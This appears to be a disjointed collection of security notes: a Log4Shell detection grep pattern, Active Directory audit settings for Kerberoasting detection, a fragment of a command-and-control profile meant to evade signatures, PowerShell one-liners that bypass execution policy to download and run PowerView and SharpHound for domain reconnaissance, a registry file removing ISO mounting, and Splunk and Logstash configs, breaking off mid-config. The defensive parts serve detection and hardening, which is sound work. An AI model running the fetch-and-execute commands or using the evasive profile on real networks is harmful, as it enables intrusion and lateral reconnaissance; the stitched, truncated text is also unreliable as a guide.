Rob rdmershon

Log4J / Log4Shell Resources

Meta: Curated by @tsudo (twitter / github) | Gist Link | Last Updated: 2021-12-15

CVE-2021-44228 link CVSS3.x 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

REGEX remove blank lines:

FIND:

^(?:[\t ]*(?:\r?\n|\r))+

	I can never remember this, but it's important to never assume a DC has been configured to audit correctly.

	Microsoft Best Practices for logging, Success \\| Failure is what the Yes \\| No correspond to

	https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/audit-policy-recommendations

	Kerberoasting Detection (shout out to Red Canary even though you expensive as hell https://redcanary.com/blog/marshmallows-and-kerberoasting/)
	Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Account Logon
	– Audit Kerberos Authentication Service: Success and Failure
	– Audit Kerberos Service Ticket Operations: Success and Failure

	# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
	# as stage0, remote injecting a thread into a suspended process works

	set host_stage "false";
	set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
	set sleeptime "10000";

	stage {
	set allocator "MapViewOfFile";
	set name "notevil.dll";

	# Domain Recon
	## ShareFinder - Look for shares on network and check access under current user context & Log to file
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess\|Out-File -FilePath sharefinder.txt"

	## Import PowerView Module
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

	## Invoke-BloodHound for domain recon
	powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

	Windows Registry Editor Version 5.00

	[-HKEY_CLASSES_ROOT\.iso]

	[-HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount\command]

	[-HKEY_CLASSES_ROOT\.img]

	[-HKEY_CLASSES_ROOT\.vhdx]

	[tcpout]
	defaultGroup = mySplunkIndexers
	maxQueueSize = 7MB

	[tcpout:mySplunkIndexers]
	server = 10.10.10.10:9997, 10.10.10.20:9997
	autoLB = true
	useACK = true

	input {
	file {
	type => "IISLog"
	path => "C:/inetpub/logs/LogFiles/W3SVC/.log"
	start_position => "beginning"
	}
	}

	filter {